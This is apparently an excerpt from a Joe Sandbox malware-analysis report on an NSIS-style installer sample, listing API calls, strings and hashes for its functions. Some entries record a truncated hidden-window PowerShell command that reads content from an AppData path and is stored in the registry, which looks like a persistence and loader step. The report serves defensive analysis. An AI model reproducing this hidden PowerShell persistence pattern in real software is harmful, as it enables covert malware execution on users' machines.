                                                  • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                  • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 0040304E
                                                  • GetTickCount.KERNEL32 ref: 0040306C
                                                  • wsprintfW.USER32 ref: 0040309A
                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                    • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD), ref: 00405762
                                                    • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                  • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                    • Part of subcall function 00403017: MulDiv.KERNEL32(000063F3,00000064,000086A8), ref: 0040302C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
                                                  • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                  • Opcode Fuzzy Hash: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
                                                  • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                  • GetMessagePos.USER32 ref: 00404FDF
                                                  • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                  • wsprintfW.USER32 ref: 00402FEA
                                                  • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                  • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                  • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                  • Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
                                                  • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                  • Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                  • wsprintfW.USER32 ref: 00404F58
                                                  • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$H/B
                                                  • API String ID: 3540041739-2222257793
                                                  • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                  • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                  • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                  • Opcode Fuzzy Hash: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                  • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                  • GetClientRect.USER32(?,?), ref: 00401DEA
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                  • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                  • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                  • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                  • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E56
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                  • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                  • Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                  • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                  • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                  • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                  • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenW.KERNEL32(-windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr,00000023,00000011,00000002), ref: 004024DA
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,-windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr,00000000,00000011,00000002), ref: 0040251A
                                                  • RegCloseKey.ADVAPI32(?,?,?,-windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr,00000000,00000011,00000002), ref: 00402602
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr
                                                  • API String ID: 2655323295-2132676196
                                                  • Opcode ID: 38efc12683e7974af6c7f2da56cd89000c1bf7f01c9e06e6298ca7266804e5c3
                                                  • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                  • Opcode Fuzzy Hash: 38efc12683e7974af6c7f2da56cd89000c1bf7f01c9e06e6298ca7266804e5c3
                                                  • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405F73
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3081826266
                                                  • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                  • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\roentgenometry\peptidoglycan), ref: 0040269A
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\roentgenometry\peptidoglycan, xrefs: 0040265E, 00402683, 00402695, 004026E1
                                                  • -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr, xrefs: 00402688
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr$C:\Users\user\AppData\Local\Temp\roentgenometry\peptidoglycan
                                                  • API String ID: 1659193697-203461261
                                                  • Opcode ID: f2b323149ec226a123e0c5e2c8aae63610c2ed85707ada0f382aad29919fcb8b
